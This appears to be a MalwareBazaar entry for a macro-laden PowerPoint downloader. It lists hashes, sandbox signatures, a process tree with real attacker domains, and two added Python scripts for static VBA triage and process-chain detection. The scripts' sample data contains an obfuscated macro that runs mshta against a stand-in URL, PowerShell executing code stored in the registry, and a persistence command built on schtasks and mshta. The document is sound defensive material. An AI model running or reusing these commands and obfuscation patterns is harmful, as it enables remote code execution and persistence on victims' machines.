MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 c45ecb10594b32cb49ec4e3356acd59b2e0819555c747657a7ce45993e5e57d7. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Threat: unknown
Vendor detections: 8



SHA256 hash: c45ecb10594b32cb49ec4e3356acd59b2e0819555c747657a7ce45993e5e57d7
SHA3-384 hash: b2c67093aab4b1c813379e2dd76b8118db4abcdea21891d95f996465c902e76110737c232b63f81b42e60ce07b989f18
SHA1 hash: 7b5672c1febeca9bc97d17951b57c9f59f9de708
MD5 hash: 04772bbc01d2088b18a869755d93b9d0
humanhash: oxygen-juliet-india-golf
File name: OrderSheet.pps
File size: 114,176 bytes
First seen: 2021-04-06 10:19:20 UTC
Last seen: 2021-04-06 11:08:41 UTC
File type: PowerPoint file (ppt)
MIME type: application/vnd.ms-powerpoint
ssdeep: 3072:uRzJsj+VgF7YwTQqXe7o5pKoYTExtwQvgoO4Ndgd6xj:0sNJ
TLSH: ADB3D71CB581C92FC3990A328D9EEEF6A2257D447DC6622B7750B3BE1F3BF249642504
Reporter: madjack_red

Intelligence


File Origin
# of uploads: 2
# of downloads: 169
Origin country: n/a
Vendor Threat Intelligence

Malware family: n/a
ID: 1
File name: OrderSheet.pps
Verdict: Malicious activity
Analysis date: 2021-04-05 06:29:42 UTC
Tags: rat nanocore trojan agenttesla
Note: ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample.
Result
Verdict: Malware
Behaviour: Creating a window

Result
Verdict: Malicious
File Type: Legacy PowerPoint File with Macro

Result
Threat name: Unknown
Detection: malicious
Classification: expl.evad
Score: 100 / 100
Signature
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with hexadecimal encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Multi AV Scanner detection for submitted file
Sigma detected: Powershell execute code from registry
Sigma detected: Schedule script from internet via mshta
Uses schtasks.exe or at.exe to add and modify task schedules
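The signature list above names the static traits of the embedded macro: base64-encoded and hex-encoded string literals, many GoTo statements, randomly named variables, and VBA that can start processes. The script below is an added example, not MalwareBazaar's or any listed vendor's code, of scoring VBA source for exactly those traits. Its thresholds, its list of process-starting identifiers and the sample macro at the bottom are assumptions constructed for the demo; the sample is not the macro from OrderSheet.pps.

```python
"""Static triage heuristics for VBA macro source.

Added example, not MalwareBazaar's or any listed vendor's code. It scores
macro source text for the indicators named in the sandbox signatures:
base64-encoded and hex-encoded string literals, many GoTo statements,
randomly named variables, and calls that can start a process. Thresholds
and the starter list are assumptions chosen for this example; the VBA at
the bottom is constructed for the demo and is not the macro from
OrderSheet.pps.
"""
import base64
import binascii
import re

# Identifiers a macro typically needs to launch a process (assumed,
# non-exhaustive list).
PROCESS_STARTERS = ("Shell", "CreateObject", "GetObject", "Run", "Exec",
                    "Win32_Process", "ShellExecute")

STRING_LITERAL = re.compile(r'"((?:[^"\n]|"")*)"')     # VBA doubles a quote to escape it
HEX_LITERAL = re.compile(r'^(?:[0-9A-Fa-f]{2}){8,}$')  # at least 8 encoded bytes
B64_LITERAL = re.compile(r'^[A-Za-z0-9+/]{16,}={0,2}$')
DIM_NAME = re.compile(r'^\s*Dim\s+([A-Za-z_]\w*)', re.IGNORECASE | re.MULTILINE)
GOTO = re.compile(r'\bGoTo\s+\w+', re.IGNORECASE)


def is_base64(lit: str) -> bool:
    """True when the literal is well-formed base64 of a plausible length."""
    if not B64_LITERAL.match(lit):
        return False
    try:
        base64.b64decode(lit, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def looks_random(name: str) -> bool:
    """Heuristic: generated names are long and mix digits into letters,
    or have almost no vowels. Short or dictionary-like names pass."""
    if len(name) < 8:
        return False
    has_digit = any(c.isdigit() for c in name)
    letters = [c for c in name.lower() if c.isalpha()]
    vowel_ratio = sum(c in "aeiou" for c in letters) / max(len(letters), 1)
    return has_digit or vowel_ratio < 0.2


def analyze_vba(src: str) -> dict:
    """Score VBA source for the obfuscation traits listed in the signatures."""
    base64_lits, hex_lits = [], []
    for lit in STRING_LITERAL.findall(src):
        if HEX_LITERAL.match(lit):       # hex first: its alphabet is a subset of base64's
            hex_lits.append(lit)
        elif is_base64(lit):
            base64_lits.append(lit)
    random_names = [n for n in DIM_NAME.findall(src) if looks_random(n)]
    starters = sorted({p for p in PROCESS_STARTERS
                       if re.search(r'\b' + re.escape(p) + r'\b', src)})
    goto_count = len(GOTO.findall(src))

    score = 0
    score += 3 if base64_lits else 0
    score += 2 if hex_lits else 0
    score += 2 if goto_count >= 2 else 0          # "many GoTo" threshold is an assumption
    score += 2 if len(random_names) >= 2 else 0
    score += 1 if starters else 0
    return {
        "base64_literals": base64_lits,
        "decoded_base64": [base64.b64decode(l).decode("utf-8", "replace") for l in base64_lits],
        "hex_literals": hex_lits,
        "decoded_hex": [bytes.fromhex(l).decode("utf-8", "replace") for l in hex_lits],
        "goto_count": goto_count,
        "random_names": random_names,
        "process_starters": starters,
        "score": score,
        "verdict": "suspicious" if score >= 5 else "clean",
    }


# Constructed sample macro (not from OrderSheet.pps): an obfuscated
# Auto_Open that hides a command in base64 and hex and runs it via WScript.Shell.
_B64_CMD = base64.b64encode(b"mshta http://example.invalid/a").decode()
_HEX_CMD = b"mshta.exe".hex().upper()
SAMPLE_VBA = f'''Sub Auto_Open()
    Dim xqZ8kPv3 As String
    Dim Hn2vWqLt9 As String
    xqZ8kPv3 = "{_B64_CMD}"
    Hn2vWqLt9 = "{_HEX_CMD}"
    GoTo L1
L1:
    GoTo L2
L2:
    Set o = CreateObject("WScript.Shell")
    o.Run Decode(xqZ8kPv3), 0
End Sub
'''

if __name__ == "__main__":
    for key, value in analyze_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Run it against macro source extracted with a tool such as olevba; the decoded literals are usually the fastest route to the next-stage URL, and the score only orders samples for a human, it does not replace a verdict.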
Behaviour
Behavior Graph (ID 382644; sample OrderSheet.pps; start date 06/04/2021; architecture WINDOWS; score 100), flattened from the rendered graph into a process tree, with the network contacts and signatures the graph attaches to each node shown in brackets:

cmd.exe
  POWERPNT.EXE
    mshta.exe  [contacts j.mp (67.199.248.17:80, GOOGLE-PRIVATE-CLOUDUS, United States), blogspot.l.googleusercontent.com (172.217.23.33:443, GOOGLEUS, United States), 3 other IPs or domains; signatures: creates autostart registry keys with suspicious values (likely registry only malware), creates multiple autostart registry keys, creates an autostart registry key pointing to binary in C:\Windows, 3 other signatures]
      powershell.exe
        mshta.exe  [contacts onedriveupdate.net (104.21.68.120:443, CLOUDFLARENETUS, United States)]
      schtasks.exe
      taskkill.exe
      taskkill.exe
taskeng.exe
  mshta.exe
    mshta.exe  [contacts www.blogger.com, resources.blogblog.com, getyournewblog.blogspot.com]
      powershell.exe
        mshta.exe  [contacts 172.67.195.85:443 (CLOUDFLARENETUS, United States)]
mshta.exe
  powershell.exe  [contacts ia801407.us.archive.org, archive.org]
7 other processes  [contact archive.org (207.241.224.2:443, INTERNET-ARCHIVEUS, United States), ia801407.us.archive.org (207.241.228.147:443, INTERNET-ARCHIVEUS, United States), 10 other IPs or domains]
  powershell.exe  [contacts ia801407.us.archive.org, archive.org]
  powershell.exe

Graph-level signatures: Multi AV Scanner detection for submitted file; Sigma detected: Powershell execute code from registry; Sigma detected: Schedule script from internet via mshta; 7 other signatures. Graph-level domains: www.blogger.com, resources.blogblog.com, 4 other IPs or domains.
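The graph above records the process chain behind the two Sigma signatures: POWERPNT.EXE launching mshta.exe, which in turn launches powershell.exe, schtasks.exe and taskkill.exe. The script below is an added example, not the sandbox vendor's rules or MalwareBazaar's code, that implements those checks over a Sysmon-style process creation log. It goes beyond this one report in two ways: it treats any Office application as a suspicious parent, and it walks the full ancestry so mshta.exe is still caught when an intermediate process sits between it and the Office parent. The event log, the command lines and the example.invalid hosts are constructed for the demo and are not the sample's real infrastructure; the registry and scheduled-task patterns are assumptions.

```python
"""Process-chain detection for the behaviour the sandbox report records:
an Office process spawning mshta.exe, schtasks.exe registering a task that
runs mshta.exe against a URL, and powershell.exe executing code read from
the registry. Added example, not the sandbox vendor's rules or
MalwareBazaar's code. Events are a constructed Sysmon-style process
creation log; the command lines are hypothetical and point at
example.invalid rather than the sample's real infrastructure."""
import re

OFFICE_APPS = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# A registry read cmdlet followed by a hive name, or the Registry:: provider
# prefix (assumed patterns, not a vendor's rule text).
REG_READ_RE = re.compile(
    r"\b(Get-ItemProperty|Get-Item|gp)\b.*\b(HKCU|HKLM|HKEY_[A-Z_]+)\b|Registry::",
    re.IGNORECASE)
EXEC_RE = re.compile(r"\b(iex|Invoke-Expression)\b", re.IGNORECASE)


def basename(image: str) -> str:
    """Lower-cased file name of an image path, tolerating / or \\ separators."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(event: dict, by_pid: dict):
    """Yield parent, grandparent, ... while they exist in the log (cycle-safe)."""
    seen = set()
    pid = event["ppid"]
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        yield by_pid[pid]
        pid = by_pid[pid]["ppid"]


def detect(events: list) -> list:
    """Return (rule, pid) findings in event order."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img = basename(e["image"])
        cmd = e.get("cmdline", "")
        low = cmd.lower()
        parent = by_pid.get(e["ppid"])

        # Office application directly launching a script host.
        if parent and basename(parent["image"]) in OFFICE_APPS and img in SCRIPT_HOSTS:
            findings.append(("office_spawns_script_host", e["pid"]))

        # Scheduled task whose action runs mshta against a remote URL.
        if img == "schtasks.exe" and "/create" in low and "mshta" in low and URL_RE.search(cmd):
            findings.append(("schtasks_mshta_url", e["pid"]))

        # PowerShell that reads a registry value and feeds it to Invoke-Expression.
        if img == "powershell.exe" and REG_READ_RE.search(cmd) and EXEC_RE.search(cmd):
            findings.append(("powershell_exec_from_registry", e["pid"]))

        # mshta anywhere beneath an Office process, even via intermediate hops.
        if img == "mshta.exe" and any(basename(a["image"]) in OFFICE_APPS
                                      for a in ancestors(e, by_pid)):
            findings.append(("mshta_under_office", e["pid"]))
    return findings


# Constructed process creation events mirroring the report's chain, plus
# benign noise (an interactive PowerPoint session, an admin's backup task,
# a registry read with no execution) to show what the rules ignore.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c start OrderSheet.pps"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE",
     "cmdline": "POWERPNT.EXE OrderSheet.pps"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/stage1.hta"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -c iex (Get-ItemProperty 'HKCU:\Software\Demo').Payload"},
    {"pid": 500, "ppid": 300, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks.exe /create /sc minute /mo 60 /tn Update /tr \"mshta https://example.invalid/t.hta\""},
    {"pid": 600, "ppid": 300, "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": "taskkill /f /im winword.exe"},
    {"pid": 700, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 800, "ppid": 700, "image": r"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE",
     "cmdline": "POWERPNT.EXE deck.pptx"},
    {"pid": 900, "ppid": 700, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /create /sc daily /tn Backup /tr C:\Tools\backup.exe"},
    {"pid": 1000, "ppid": 700, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -c Get-ItemProperty HKLM:\SOFTWARE\Demo"},
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The ancestry walk matters for this sample: in the graph the second mshta.exe and the third are children of powershell.exe, not of POWERPNT.EXE, so a parent-only rule would see only the first hop.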
Result
Threat name: Script-Macro.Trojan.Valyria
Status: Malicious
First seen: 2021-04-03 08:17:13 UTC
AV detection: 16 of 29 (55.17%)
Threat level: 5/5

Result
Malware family: n/a
Score: 8/10
Tags: macro macro_on_action
Behaviour:
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory

Please note that we are no longer able to provide a coverage score for VirusTotal.

File information



Comments